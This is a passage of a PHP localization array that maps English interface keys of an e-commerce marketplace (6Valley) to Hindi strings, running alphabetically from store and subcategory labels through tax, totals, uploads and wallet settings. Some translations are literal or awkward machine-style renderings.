'स्टोर्स वन', 'stores_two' => 'भंडार दो', 'street_1 _street_2 _street_3 _street_4' => 'स्ट्रीट 1 स्ट्रीट 2 स्ट्रीट 3 स्ट्रीट 4', 'string' => 'डोरी', 'stripe' => 'पट्टी', 'sub_Categories' => 'उप श्रेणियां', 'sub_Category' => 'उप श्रेणी', 'sub_Sub_Categories' => 'उप उप श्रेणियां', 'sub_Sub_Category' => 'उप उप श्रेणी', 'sub_Title' => 'उप -शीर्षक', 'sub_categories' => 'उप श्रेणियां', 'sub_category' => 'उप श्रेणी', 'sub_category_Logo' => 'उप श्रेणी का लोगो', 'sub_category_form' => 'उप श्रेणी प्रपत्र', 'sub_category_list' => 'उप श्रेणी सूची', 'sub_category_table' => 'उप श्रेणी तालिका', 'sub_sub_categories' => 'उप उप श्रेणियां', 'sub_sub_category' => 'उप उप श्रेणी', 'sub_sub_category_form' => 'उप उप श्रेणी प्रपत्र', 'sub_sub_category_list' => 'उप उप श्रेणी सूची', 'sub_sub_category_name' => 'उप उप श्रेणी का नाम', 'sub_sub_category_table' => 'उप उप श्रेणी तालिका', 'sub_total' => 'उप -कुल', 'sub_totalvfdv' => 'उप -कुलवें', 'subcategory' => 'उपश्रेणी', 'subject' => 'विषय', 'submit' => 'जमा करना', 'submit_a_review' => 'एक समीक्षा प्रस्तुत करें', 'submit_a_ticket' => 'टिकट जमा करें', 'submit_message' => 'संदेश जमा करें', 'submit_new_ticket' => 'नया टिकट सबमिट करें', 'submition_date' => 'जमा -दिनांक', 'subscribe' => 'Subscribe', 'subscribe to our new channel to get latest updates' => 'नवीनतम अपडेट प्राप्त करने के लिए हमारे नए चैनल की सदस्यता लें', 'subscribe_our_newsletter_to_get_latest_updates' => 'नवीनतम अपडेट प्राप्त करने के लिए हमारे समाचार पत्र की सदस्यता लें', 'subscribe_to_our_new_channel_to_get_latest_updates' => 'नवीनतम अपडेट प्राप्त करने के लिए हमारे नए चैनल की सदस्यता लें', 'subscriber_list' => 'ग्राहक सूची', 'subscribers' => 'ग्राहकों', 'subscription_date' => 'सदस्यता तिथि', 'subscriptions' => 'सदस्यता', 'subtotal' => 'उप-योग', 'successfully added!' => 'सफलतापूर्वक शामिल!', 'successfully product added!' => 'सफलतापूर्वक उत्पाद जोड़ा गया!', 'successfully product deleted!' => 'सफलतापूर्वक उत्पाद हटा दिया गया!', 'successfully product updated!' => 'सफलतापूर्वक उत्पाद अपडेट किया गया!', 'successfully removed!' => 'सफलतापूर्वक हटा दिया गया!', 'successfully review submitted!' => 'सफलतापूर्वक समीक्षा प्रस्तुत की गई!', 'successfully updated!' => 'सफलतापूर्वक उत्परिवर्तित!', 'successfully_added' => 'सफलतापूर्वक शामिल', 'successfully_added!' => 'सफलतापूर्वक शामिल!', 'successfully_added_review' => 'सफलतापूर्वक जोड़ा समीक्षा', 'successfully_canceled' => 'सफलतापूर्वक रद्द कर दिया गया', 'successfully_copied' => 'सफलतापूर्वक कॉपी किया गया', 'successfully_removed' => 'सफलतापूर्वक हटा दिया गया', 'successfully_updated' => 'सफलतापूर्वक उत्परिवर्तित', 'successfully_updated!' => 'सफलतापूर्वक उत्परिवर्तित!', 'successfully_uploaded' => 'सफलतापूर्वक अपलोड किया गया', 'summary' => 'सारांश', 'support' => 'सहायता', 'support ticket convs' => 'टिकट का समर्थन करें', 'support tickets' => 'टिकट का समर्थन करें', 'support_Ticket' => 'समर्थन टिकट', 'support_Ticket_Answer' => 'समर्थन टिकट उत्तर', 'support_section' => 'सहायता अनुभाग', 'support_ticket' => 'समर्थन टिकट', 'suspend' => 'निलंबित करें', 'suspend_this_seller' => 'इस विक्रेता को निलंबित करें', 'system' => 'प्रणाली', 'system_Addons' => 'तंत्रीय जोड़ें', 'system_Settings' => 'प्रणाली व्यवस्था', 'system_Setup' => 'सिस्टम सेटअप', 'system_default' => 'प्रणालीगत चूक', 'system_default_currency' => 'तंत्र डिफ़ॉल्ट मुद्रा', 'system_setup' => 'सिस्टम सेटअप', 't_id' => 'टी आईडी', 'table' => 'मेज़', 'tag' => 'टैग', 'tags' => 'टैग', 'tax' => 'कर', 'tax_Collected' => 'कर एकत्र किया गया कर', 'tax_Model' => 'कर मॉडल', 'tax_amount' => 'कर राशि', 'tax_calculation' => 'कर गणना', 'tax_fee' => 'कर शुल्क', 'tax_incl.' => 'कर सहित।', 'tax_included' => 'टैक्स शामिल', 'team_ID' => 'टीम आईडी', 'team_id' => 'टीम आईडी', 'template_id' => 'टेम्पलेट आईडी', 'temporary_Close' => 'अस्थायी करीबी', 'temporary_block_time' => 'अस्थायी ब्लॉक काल', 'temporary_close' => 'अस्थायी करीबी', 'temporary_close_inactive_successfully' => 'अस्थायी निकट निष्क्रिय सफलतापूर्वक', 'temporary_close_updated_successfully' => 'अस्थायी क्लोज को सफलतापूर्वक अद्यतन किया गया', 'temporary_closed' => 'अस्थायी बंद', 'temporary_login_block_time' => 'अस्थायी लॉगिन ब्लॉक समय', 'terms_&_conditions' => 'नियम एवं शर्तें', 'terms_&_policy' => 'शर्तें और नीति', 'terms_and_condition' => 'नियम और शर्तें', 'test' => 'परीक्षा', 'test 1' => 'टेस्ट 1', 'test product' => 'परीक्षण उत्पाद', 'test product 1' => 'परीक्षण उत्पाद 1', 'test product 2' => 'परीक्षण उत्पाद 2', 'test product minus value' => 'परीक्षण उत्पाद माइनस मूल्य', 'test shipping' => 'परीक्षण शिपिंग', 'test_SMTP_connection' => 'एसएमटीपी कनेक्शन का परीक्षण करें', 'test_your_email_integration' => 'अपने ईमेल एकीकरण का परीक्षण करें', 'text' => 'मूलपाठ', 'text_color' => 'पाठ का रंग', 'text_fee' => 'कर शुल्क', 'text_updated_successfully' => 'पाठ को सफलतापूर्वक अपडेट किया गया', 'thank_you_for_order' => 'आदेश के लिए धन्यवाद', 'thank_you_for_your_order' => 'आपके ऑर्डर के लिए धन्यवाद', 'thank_you_for_your_verification' => 'आपके सत्यापन के लिए धन्यवाद', 'thanks' => 'धन्यवाद', 'thanks_for_shopping_with' => 'खरीदारी के लिए धन्यवाद', 'thanks_for_the_order' => 'आदेश के लिए धन्यवाद', 'the_amount_needs_to_be_between' => 'राशि के बीच होना चाहिए', 'the_app_download_link_is_the_URL_that_allows_users_to_update_the_app_by_clicking_the_Update_App_button_within_the_app_itself' => 'ऐप डाउनलोड लिंक वह URL है जो उपयोगकर्ताओं को ऐप के भीतर अपडेट ऐप बटन पर क्लिक करके ऐप को अपडेट करने की अनुमति देता है', 'the_bonus_amount_will_be_deduct_from_admin_wallet_&_will_consider_as_admin_expense' => 'बोनस राशि को व्यवस्थापक वॉलेट से काट दिया जाएगा और व्यवस्थापक व्यय के रूप में विचार करेगा', 'the_coupon_discount_bearer_is_admin' => 'कूपन डिस्काउंट बियरर व्यवस्थापक है', 'the_lowest_number_get_highest_priority' => 'सबसे कम संख्या को सर्वोच्च प्राथमिकता मिलती है', 'the_lowest_number_will_get_highest_priority' => 'सबसे कम संख्या को सर्वोच्च प्राथमिकता मिलेगी', 'the_lowest_number_will_get_the_highest_priority' => 'सबसे कम संख्या को सर्वोच्च प्राथमिकता मिलेगी', 'the_minimum_customer_app_version_required_for_the_app_functionality' => 'ऐप कार्यक्षमता के लिए आवश्यक न्यूनतम ग्राहक ऐप संस्करण', 'the_minimum_deliveryman_app_version_required_for_the_app_functionality' => 'ऐप कार्यक्षमता के लिए आवश्यक न्यूनतम डिलीवरीमैन ऐप संस्करण', 'the_minimum_seller_app_version_required_for_the_app_functionality' => 'ऐप कार्यक्षमता के लिए आवश्यक न्यूनतम विक्रेता ऐप संस्करण', 'the_ongoing_order_amount_will_be_shown_here' => 'चल रहे ऑर्डर राशि को यहां दिखाया जाएगा', 'the_page_you_requested_could_not_be_found' => 'आपने जिस पृष्ठ का अनुरोध किया है वह नहीं मिल सका', 'the_product_report_will_show_based_on_the_product_added_date' => 'उत्पाद रिपोर्ट उत्पाद जोड़ा तिथि के आधार पर दिखाई देगी', 'the_products_are_shown_in_this_list _which_quantity_is_below' => 'उत्पादों को इस सूची में दिखाया गया है कि कौन सी मात्रा नीचे है', 'theme_delete_successfully' => 'थीम सफलतापूर्वक हटाएं', 'theme_mode' => 'थीम मोड', 'theme_setup' => 'थीम सेटअप', 'theme_templates' => 'थीम टेम्प्लेट', 'theme_upload_successfully!' => 'थीम अपलोड सफलतापूर्वक!', 'there_may_be_some_features_that_are_not_available_in_other_themes.' => 'कुछ विशेषताएं हो सकती हैं जो अन्य विषयों में उपलब्ध नहीं हैं।', 'these_saved_data_is_only_applicable_only_for_' => 'ये सहेजे गए डेटा केवल केवल के लिए लागू होते हैं', 'they_can_browse_and_search_for_products_from_each_brand_inside_any_shop' => 'वे किसी भी दुकान के अंदर प्रत्येक ब्रांड से उत्पादों की खोज और खोज कर सकते हैं', 'they_cannot_purchase_or_place_order_from_your_shop' => 'वे आपकी दुकान से ऑर्डर खरीद या रख नहीं सकते', 'they_register_6Valley_with_special_offer' => 'वे विशेष प्रस्ताव के साथ 6valley पंजीकृत करते हैं', 'think_before_you_proceed' => 'आगे बढ़ने से पहले सोचें', 'third_party_apis' => 'थर्ड पार्टी एपीआई', 'third_party_delivery_tracking_id' => 'तृतीय पक्ष वितरण ट्रैकिंग आईडी', 'third_step' => 'तीसरा चरण', 'this_Month' => 'इस महीने', 'this_Months_Statistics' => 'इस महीने के आंकड़े', 'this_Week' => 'इस सप्ताह', 'this_Year' => 'इस साल', 'this_app_version_means_the_minimum_version_of_Seller_Deliveryman_and_Customer_apps_that_are_required_for_the_update' => 'इस ऐप संस्करण का अर्थ है विक्रेता डिलीवरीमैन और ग्राहक ऐप का न्यूनतम संस्करण जो अपडेट के लिए आवश्यक है', 'this_count_is_the_summation_of' => 'यह गिनती का योग है', 'this_count_is_the_summation_of_delivered_orders' => 'यह गिनती वितरित आदेशों का योग है', 'this_coupon_is_valid_for_use_after_a_minimum_purchase_of' => 'यह कूपन न्यूनतम खरीद के बाद उपयोग के लिए मान्य है', 'this_discount_is_not_applied_for_this_amount' => 'यह छूट इस राशि के लिए लागू नहीं है', 'this_field_required' => 'इस क्षेत्र की आवश्यकता है', 'this_helps_to_keep_your_new_password_secure.' => 'यह आपके नए पासवर्ड को सुरक्षित रखने में मदद करता है।', 'this_is_the_service_key_ID_file_and_also_after_AuthKey_that_is_the_key_ID' => 'यह सेवा कुंजी आईडी फ़ाइल है और यह भी कि प्रामाणिक आईडी है', 'this_item_is_currently_sold_out' => 'यह आइटम फ़िलहाल बिक चुका है', 'this_module_will_run_for_updates_after_version_13.1' => 'यह मॉड्यूल 13.1 संस्करण के बाद अपडेट के लिए चलेगा', 'this_month' => 'इस महीने', 'this_number_indicates_how_much_data_will_be_shown_in_the_list_or_table' => 'यह संख्या इंगित करती है कि सूची या तालिका में कितना डेटा दिखाया जाएगा', 'this_shop_currently_close_now' => 'यह दुकान वर्तमान में अब करीब है', 'this_shop_is_temporary_closed._You_cannot_add_product_to_cart_from_this_shop_for_now' => 'यह दुकान अस्थायी बंद है। आप अभी के लिए इस दुकान से गाड़ी में उत्पाद नहीं जोड़ सकते', 'this_shop_is_temporary_closed_or_on_vacation' => 'यह दुकान अस्थायी बंद या छुट्टी पर है', 'this_shop_is_temporary_closed_or_on_vacation.' => 'यह दुकान अस्थायी बंद या छुट्टी पर है।', 'this_shop_is_temporary_closed_or_on_vacation._You_cannot_add_product_to_cart_from_this_shop_for_now' => 'यह दुकान अस्थायी बंद या छुट्टी पर है। आप अभी के लिए इस दुकान से गाड़ी में उत्पाद नहीं जोड़ सकते', 'this_week' => 'इस सप्ताह', 'this_will_allow_the_system_to_send_emails_using_the_configured_SMTP_settings' => 'यह सिस्टम को कॉन्फ़िगर किए गए SMTP सेटिंग्स का उपयोग करके ईमेल भेजने की अनुमति देगा', 'this_year' => 'इस साल', 'this_year_earning' => 'इस वर्ष की कमाई', 'ticket' => 'टिकट', 'ticket_closed_successfully.' => 'टिकट सफलतापूर्वक बंद हो गया।', 'time' => 'समय', 'time_zone' => 'समय क्षेत्र', 'title' => 'शीर्षक', 'tls' => 'टीएलएस', 'to' => 'को', 'to_cancel_invoice' => 'चालान रद्द करने के लिए', 'to_click_add_new_customer' => 'नया ग्राहक जोड़ें पर क्लिक करने के लिए', 'to_click_cancel_cart_item_all' => 'सभी को रद्द करने के लिए कार्ट आइटम को रद्द करने के लिए', 'to_click_clear_cart' => 'क्लियर कार्ट पर क्लिक करने के लिए', 'to_click_coupon_discount' => 'कूपन छूट पर क्लिक करने के लिए', 'to_click_extra_discount' => 'अतिरिक्त छूट पर क्लिक करने के लिए', 'to_click_new_order' => 'नए आदेश पर क्लिक करने के लिए', 'to_click_order' => 'आदेश पर क्लिक करने के लिए', 'to_click_payment_submit' => 'भुगतान सबमिट पर क्लिक करने के लिए', 'to_click_short_cut_keys' => 'शॉर्ट कट कीज़ पर क्लिक करने के लिए', 'to_close_payment_submit' => 'भुगतान सबमिट करने के लिए', 'to_date' => 'तारीख तक', 'to_decrease_product_quantity_use_minus_before_number._Ex=> -10' => 'उत्पाद की मात्रा को कम करने के लिए संख्या से पहले माइनस का उपयोग करें। पूर्व=> -10', 'to_delete_change_the_default_language_first' => 'पहले डिफ़ॉल्ट भाषा को बदलने के लिए पहले', 'to_focus_search_input' => 'खोज इनपुट पर ध्यान केंद्रित करने के लिए', 'to_get_delivery_updates' => 'डिलीवरी अपडेट प्राप्त करने के लिए', 'to_get_site_key_and_secret_key_Go_to_the_Credentials_page' => 'साइट कुंजी और गुप्त कुंजी प्राप्त करने के लिए क्रेडेंशियल्स पेज पर जाएं', 'to_print_invoice' => 'चालान प्रिंट करने के लिए', 'to_submit_add_new_customer_form' => 'नया ग्राहक फॉर्म जोड़ने के लिए', 'to_the_featured_section' => 'चित्रित अनुभाग के लिए', 'to_view_your_order_sign_into_your' => 'अपने ऑर्डर साइन को अपने में देखने के लिए', 'to_view_your_order_sign_into_your 6Valley account_and_please_click_below_button' => 'अपने ऑर्डर साइन को अपने 6valley अकाउंट में देखने के लिए और कृपया नीचे दिए गए बटन पर क्लिक करें', 'to_view_your_order_sign_into_your6Valley' => 'अपने ऑर्डर साइन को Your6valley में देखने के लिए', 'to_wallet' => 'बटुए में', 'todays_Statistics' => 'आज के आंकड़े', 'toggle button from the top' => 'ऊपर से बटन टॉगल करें', 'token' => 'टोकन', 'too_many_attempts. please_try_again_after_' => 'भी कई प्रयास। कृपया फिर से प्रयास करें', 'top' => 'शीर्ष', 'top rated' => 'टॉप रेटेड', 'top-rated' => 'टॉप रेटेड', 'top_Delivery_Man' => 'शीर्ष वितरण आदमी', 'top_Side_Banner' => 'शीर्ष साइड बैनर', 'top_customer' => 'शीर्ष ग्राहक', 'top_fashion_house' => 'शीर्ष फैशन हाउस', 'top_rated' => 'टॉप रेटेड', 'top_rated_product' => 'शीर्ष रेटेड उत्पाद', 'top_rated_product_from_this_store' => 'इस स्टोर से शीर्ष रेटेड उत्पाद', 'top_rated_seller' => 'सबसे चहीता विक्रेता', 'top_selling_products' => 'शीर्ष विक्रय उत्पाद', 'top_selling_store' => 'शीर्ष विक्रय भंडार', 'top_store_by_order_received' => 'प्राप्त आदेश द्वारा शीर्ष स्टोर', 'topic' => 'विषय', 'total' => 'कुल', 'total_Amount' => 'कुल राशि', 'total_Amount_Sold' => 'बेची गई कुल राशि', 'total_Commission_given' => 'दी गई कुल आयोग', 'total_Coupon_Discount' => 'कुल कूपन छूट', 'total_Customers' => 'कुल ग्राहक', 'total_Delivery_Charge' => 'कुल वितरण प्रभार', 'total_Deliveryman' => 'कुल वितरण', 'total_Discount_Given' => 'दी गई कुल छूट', 'total_Discounted_Amount' => 'कुल रियायती राशि', 'total_Earning' => 'कुल कमाई', 'total_Earnings' => 'कुल कमाई', 'total_Expense' => 'कुल खर्च', 'total_Expense_Amount' => 'कुल व्यय राशि', 'total_In-House_Products' => 'कुल इन-हाउस उत्पाद', 'total_In_House_Products' => 'घर के उत्पादों में कुल', 'total_Order' => 'कुल आदेश', 'total_Order_Amount' => 'कुल आदेश राशि', 'total_Ordered_Product_Price' => 'कुल आदेशित उत्पाद मूल्य', 'total_Orders' => 'कुल आदेश', 'total_Price' => 'कुल कीमत', 'total_Product' => 'कुल उत्पाद', 'total_Product_Amount' => 'कुल उत्पाद राशि', 'total_Product_Discount' => 'कुल उत्पाद छूट', 'total_Product_Sale' => 'कुल उत्पाद बिक्री', 'total_Products' => 'कुल उत्पाद', 'total_Quantity' => 'कुल मात्रा', 'total_Quantity_Sold' => 'कुल मात्रा बेची गई', 'total_Sale' => 'कुल बिक्री', 'total_Seller' => 'कुल विक्रेता', 'total_Seller_Products' => 'कुल विक्रेता उत्पाद', 'total_Shop' => 'कुल दुकान', 'total_Shop_Earnings' => 'कुल दुकान आय', 'total_Stores' => 'कुल भंडार', 'total_Tax' => 'कुल कर', 'total_Transactions' => 'कुल लेनदेन', 'total_amount' => 'कुल राशि', 'total_balance' => 'कुल शेष', 'total_business_overview' => 'कुल व्यवसाय अवलोकन', 'total_collected_tax' => 'कुल एकत्र कर', 'total_coupon_discount' => 'कुल कूपन छूट', 'total_delivery_charge' => 'कुल वितरण प्रभार', 'total_delivery_charge_earned' => 'कुल वितरण प्रभार अर्जित', 'total_discount' => 'कुल छूट', 'total_discounted_amount' => 'कुल रियायती राशि', 'total_earning' => 'कुल कमाई', 'total_earnings' => 'कुल कमाई', 'total_expense' => 'कुल खर्च', 'total_expense_amount' => 'कुल व्यय राशि', 'total_expense_transactions' => 'कुल व्यय लेनदेन', 'total_in_Wishlist' => 'विशलिस्ट में कुल', 'total_loyalty_point' => 'कुल निष्ठा बिंदु', 'total_order' => 'कुल आदेश', 'total_order_amount' => 'कुल आदेश राशि', 'total_ordered_product_price' => 'कुल आदेशित उत्पाद मूल्य', 'total_orders' => 'कुल आदेश', 'total_point' => 'कुल बिंदु', 'total_price' => 'कुल कीमत', 'total_price_for_this_product' => 'इस उत्पाद के लिए कुल कीमत', 'total_product' => 'कुल उत्पाद', 'total_product_amount' => 'कुल उत्पाद राशि', 'total_product_discount' => 'कुल उत्पाद छूट', 'total_products' => 'कुल उत्पाद', 'total_refund_amount' => 'कुल वापसी राशि', 'total_refundable_amount' => 'कुल वापसी योग्य राशि', 'total_sale_of' => 'की कुल बिक्री', 'total_settled_amount' => 'कुल समझौता राशि', 'total_sold' => 'कुल बेचा', 'total_tax' => 'कुल कर', 'total_tax_collected' => 'कुल कर एकत्रित किया गया', 'total_tax_given' => 'दी गई कुल कर', 'total_transaction' => 'कुल लेनदेन', 'total_transactions' => 'कुल लेनदेन', 'total_withdraw' => 'कुल वापसी', 'totals' => 'योग', 'totals_cost' => 'कुल लागत', 'touch' => 'छूना', 'track_ID' => 'ट्रैक आईडी', 'track_Order' => 'ऑर्डर पर नज़र रखना', 'track_Order_Result' => 'ट्रैक ऑर्डर परिणाम', 'track_order' => 'ऑर्डर पर नज़र रखना', 'track_order_result' => 'ट्रैक ऑर्डर परिणाम', 'track_your_order' => 'अपने आर्डर को ट्रेक करें', 'tracking_id' => 'ट्रैकिंग आईडी', 'tracking_status' => 'ट्रैकिंग स्थिति', 'transaction' => 'लेन-देन', 'transaction id' => 'लेन -देन आईडी', 'transaction_Date' => 'कार्यवाही की तिथि', 'transaction_ID' => 'लेन -देन आईडी', 'transaction_Report' => 'लेन -देन रिपोर्ट', 'transaction_date' => 'कार्यवाही की तिथि', 'transaction_history' => 'ट्रांजेक्शन इतिहास', 'transaction_id' => 'लेन -देन आईडी', 'transaction_report' => 'लेन -देन रिपोर्ट', 'transaction_table' => 'लेन -देन सारणी', 'transaction_type' => 'सौदे का प्रकार', 'transactions' => 'लेनदेन', 'transection_history' => 'संक्रमण इतिहास', 'translate' => 'अनुवाद', 'translations' => 'अनुवाद', 'true' => 'सत्य', 'turn' => 'मोड़', 'turn off' => 'बंद करें', 'turn on' => 'चालू करो', 'turn_OFF' => 'बंद करें', 'turn_off' => 'बंद करें', 'turn_on' => 'चालू करो', 'twilio_sms' => 'ट्विलियो एसएमएस', 'twitter' => 'ट्विटर', 'twitter_API_Set_up_Instructions' => 'ट्विटर एपीआई ने निर्देश दिए', 'type' => 'प्रकार', 'type _your_message' => 'अपना संदेश टाइप करें', 'type_here' => 'यहाँ टाइप करें', 'type_your_message_here' => 'यहाँ आपके संदेश लिखें', 'type_your_message_here..' => 'यहाँ आपके संदेश लिखें..', 'type_your_subtitle_text' => 'अपना उपशीर्षक पाठ टाइप करें', 'type_your_title_text' => 'अपना शीर्षक पाठ टाइप करें', 'unblock' => 'अनब्लॉक', 'unit' => 'इकाई', 'unit_price' => 'यूनिट मूल्य', 'unit_price_($)' => 'यूनिट मूल्य ($)', 'unpaid' => 'अवैतनिक', 'upcoming_campaign' => 'आगामी अभियान', 'update' => 'अद्यतन', 'update_&_Publish' => 'अद्यतन और प्रकाशित करें', 'update_cart' => 'कार्ट अपडेट करें', 'update_category_shipping_cost' => 'अद्यतन श्रेणी शिपिंग लागत', 'update_discount' => 'अद्यतन छूट', 'update_information_to_continue' => 'जारी रखने के लिए जानकारी अपडेट करें', 'update_option_is_disabled_for_demo' => 'अद्यतन विकल्प डेमो के लिए अक्षम है', 'update_product' => 'अद्यतन उत्पाद', 'update_product_list' => 'अद्यतन उत्पाद सूची', 'update_product_quantity' => 'उत्पाद मात्रा को अद्यतन करें', 'update_quantity' => 'अद्यतन मात्रा', 'update_successful' => 'सफलतापूर्वक नवीनीकरण', 'update_tax' => 'अद्यतन कर', 'update_third_party_delivery_info' => 'तृतीय पक्ष वितरण जानकारी अपडेट करें', 'update_this_Address' => 'इस पते को अपडेट करें', 'update_this_address' => 'इस पते को अपडेट करें', 'update_to_cart' => 'कार्ट को अपडेट करें', 'update_your_bank_info_first' => 'पहले अपनी बैंक जानकारी अपडेट करें', 'updated successfully!' => 'सफलतापूर्वक अपडेट किया गया!', 'updated_file' => 'अद्यतन की गई फ़ाइल', 'updated_files' => 'अद्यतन की गई फ़ाइलें', 'updated_product_list' => 'अद्यतन उत्पाद सूची', 'updated_products' => 'अद्यतन उत्पाद', 'updated_successfully' => 'सफलतापूर्वक अपडेट किया गया', 'updated_successfully!' => 'सफलतापूर्वक अपडेट किया गया!', 'upload' => 'डालना', 'upload it in the form below and submit.' => 'इसे नीचे दिए गए फॉर्म में अपलोड करें और सबमिट करें।', 'upload_&_update' => 'अपलोड और अद्यतन', 'upload_Addons' => 'Addons अपलोड करें', 'upload_Banner' => 'अपलोड बैनर', 'upload_Icon' => 'अपलोड आइकन', 'upload_Picture_on_Delivery' => 'डिलीवरी पर चित्र अपलोड करें', 'upload_additional_image' => 'अतिरिक्त छवि अपलोड करें', 'upload_additional_product_images' => 'अतिरिक्त उत्पाद चित्र अपलोड करें', 'upload_any_additional_images_for_this_product_from_here' => 'इस उत्पाद के लिए यहां से कोई अतिरिक्त चित्र अपलोड करें', 'upload_file' => 'फ़ाइल अपलोड करें', 'upload_image' => 'तस्विर अपलोड करना', 'upload_it_in_the_form_below_and_submit.' => 'इसे नीचे दिए गए फॉर्म में अपलोड करें और सबमिट करें।', 'upload_logo' => 'अपलोड लोगो', 'upload_max_filesize' => 'अधिकतम फ़ाइल अपलोड करें', 'upload_product_images' => 'उत्पाद चित्र अपलोड करें', 'upload_the_digital_products_from_here' => 'यहां से डिजिटल उत्पादों को अपलोड करें', 'upload_the_updated_file' => 'अद्यतन फ़ाइल अपलोड करें', 'upload_theme' => 'अपलोड थीम', 'upload_thumbnail' => 'थंबनेल अपलोड करें', 'upload_zip_file' => 'ज़िप फ़ाइल अपलोड करें', 'uploaded_file' => 'अपलोड की गई फ़ाइल', 'urgent' => 'अति आवश्यक', 'use_referral_code' => 'रेफरल कोड का उपयोग करें', 'use_the_code_to_change_your_password_on_our_secure_website.' => 'हमारी सुरक्षित वेबसाइट पर अपना पासवर्ड बदलने के लिए कोड का उपयोग करें।', 'used' => 'इस्तेमाल किया गया', 'usename' => 'सीन', 'user' => 'उपयोगकर्ता', 'user_Section' => 'उपयोगकर्ता अनुभाग', 'user_app_version_control' => 'उपयोगकर्ता ऐप संस्करण नियंत्रण', 'user_can_place_order_without_login' => 'उपयोगकर्ता लॉगिन के बिना ऑर्डर दे सकता है', 'user_cannot_place_order_without_login' => 'उपयोगकर्ता लॉगिन के बिना ऑर्डर नहीं दे सकता', 'user_limit' => 'उपयोगकर्ता सीमा', 'user_management' => 'प्रयोक्ता प्रबंधन', 'user_section' => 'उपयोगकर्ता अनुभाग', 'username' => 'उपयोगकर्ता नाम', 'vacation_End' => 'अवकाश अंत', 'vacation_Mode' => 'छुट्टी प्रणाली', 'vacation_Note' => 'अवकाश नोट', 'vacation_Start' => 'अवकाश शुरू', 'valid_OAuth_Redirect_URIs' => 'मान्य oauth पुनर्निर्देशित उरिस', 'valid_till' => 'मान्य के लिए', 'value' => 'कीमत', 'value_is_grater _or_equal_to_180M' => 'मूल्य ग्रेटर या 180 मीटर के बराबर है', 'value_is_grater _or_equal_to_20M' => 'मूल्य ग्रेटर या 20 मी के बराबर है', 'value_is_grater _or_equal_to_20MB' => 'मूल्य ग्रेटर या 20MB के बराबर है', 'value_is_grater_or_equal_to_200M' => 'मूल्य ग्रेटर या 200 मीटर के बराबर है', 'value_is_grater_or_equal_to_20M' => 'मूल्य ग्रेटर या 20 मी के बराबर है', 'value_is_grater_or_equal_to_20MB' => 'मूल्य ग्रेटर या 20MB के बराबर है', 'variant' => 'प्रकार', 'variant Price' => 'प्रकार की कीमत', 'variant_Price' => 'प्रकार की कीमत', 'variation' => 'उतार-चढ़ाव', 'variation wise product test' => 'भिन्नता वार उत्पाद परीक्षण', 'variations' => 'बदलाव', 'various product' => 'विभिन्न उत्पाद', 'vat' => 'टब', 'verification' => 'सत्यापन', 'verification_code' => 'सत्यापन कोड', 'verification_done_successfully' => 'सत्यापन सफलतापूर्वक किया', 'verification_successfully_completed' => 'सत्यापन सफलतापूर्वक पूरा हुआ', 'verify' => 'सत्यापित करें', 'verify_information_to_continue' => 'जारी रखने के लिए जानकारी सत्यापित करें', 'verify_status' => 'स्थिति सत्यापित करें', 'view' => 'देखना', 'view more' => 'और देखें', 'view_Order_Details' => 'आदेश विवरण देखो', 'view_all' => 'सभी को देखें', 'view_all_cart_items' => 'सभी कार्ट आइटम देखें', 'view_all_hold_orders' => 'सभी होल्ड ऑर्डर देखें', 'view_cart' => 'टोकरी देखें', 'view_less' => 'कम देखें', 'view_live' => 'लाइव देखें', 'view_more' => 'और देखें', 'view_website' => 'वेबसाइट देखें', 'visit' => 'मिलने जाना', 'visit_Store' => 'भेंट की दुकान', 'visit_again' => 'पुनः पधारें', 'visit_shop' => 'यात्रा दुकान', 'visit_website' => 'बेवसाइट देखना', 'waiting_for_location' => 'स्थान की प्रतीक्षा में', 'walking customer' => 'पैदल चलने वाला ग्राहक', 'walking_customer' => 'पैदल चलने वाला ग्राहक', 'wallet' => 'बटुआ', 'wallet transactions' => 'बटुए लेन -देन', 'wallet_Amount' => 'बटुए की मात्रा', 'wallet_Bonus_Added_Successfully' => 'वॉलेट बोनस ने सफलतापूर्वक जोड़ा', 'wallet_Bonus_Setup' => 'बटुआ बोनस सेटअप', 'wallet_Bonus_Table' => 'बटुआ बोनस टेबल', 'wallet_Payments' => 'बटुए भुगतान', 'wallet_amount' => 'बटुए की मात्रा', 'wallet_bonus' => 'बटुआ बोनस', 'wallet_bonus_edit' => 'बटुआ बोनस संपादित करें', 'wallet_bonus_is_only_applicable_when_a_customer_add_fund_to_wallet_via_outside_payment_gateway' => 'वॉलेट बोनस केवल तभी लागू होता है जब कोई ग्राहक बाहर के भुगतान गेटवे के माध्यम से बटुए में फंड जोड़ता है', 'wallet_bonus_setup' => 'बटुआ बोनस सेटअप', 'wallet_payment' => 'बटुआ भुगतान', 'wallet_statistics' => 'बटुए सांख्यिकी', 'want_to_Turn_OFF_' => 'बंद करना चाहते हैं', 'want_to_Turn_OFF_Add_Fund_to_Wallet_option' => 'Add Fund To Wallet विकल्प को बंद करना चाहते हैं', 'want_to_Turn_OFF_Billing_Address_in_Checkout' => 'चेकआउट में बिलिंग पता बंद करना चाहते हैं', 'want_to_Turn_OFF_Customer_Wallet' => 'ग्राहक बटुआ बंद करना चाहते हैं', 'want_to_Turn_OFF_Delivery_Available_Country' => 'डिलीवरी उपलब्ध देश को बंद करना चाहते हैं', 'want_to_Turn_OFF_Delivery_Available_Zip_Code_Area' => 'डिलीवरी उपलब्ध ज़िप कोड क्षेत्र को बंद करना चाहते हैं', 'want_to_Turn_OFF_Digital_Product' => 'डिजिटल उत्पाद बंद करना चाहते हैं', 'want_to_Turn_OFF_Free_Delivery' => 'मुफ्त डिलीवरी बंद करना चाहते हैं', 'want_to_Turn_OFF_Loyalty_Point' => 'वफादारी बिंदु को बंद करना चाहते हैं', 'want_to_Turn_OFF_Minimum_Order_Amount' => 'न्यूनतम आदेश राशि को बंद करना चाहते हैं', 'want_to_Turn_OFF_Order_Delivery_Verification' => 'ऑर्डर डिलीवरी सत्यापन को बंद करना चाहते हैं', 'want_to_Turn_OFF_POS_for_Seller' => 'विक्रेता के लिए पीओएस बंद करना चाहते हैं', 'want_to_Turn_OFF_Product_Brand' => 'उत्पाद ब्रांड को बंद करना चाहते हैं', 'want_to_Turn_OFF_Referral_And_Earning_option' => 'रेफरल और कमाई का विकल्प बंद करना चाहते हैं', 'want_to_Turn_OFF_Refund_to_Wallet_option' => 'बटुए विकल्प के लिए धनवापसी बंद करना चाहते हैं', 'want_to_Turn_OFF_Self_Registration' => 'स्वयं पंजीकरण बंद करना चाहते हैं', 'want_to_Turn_OFF_the_App_Store_button' => 'ऐप स्टोर बटन को बंद करना चाहते हैं', 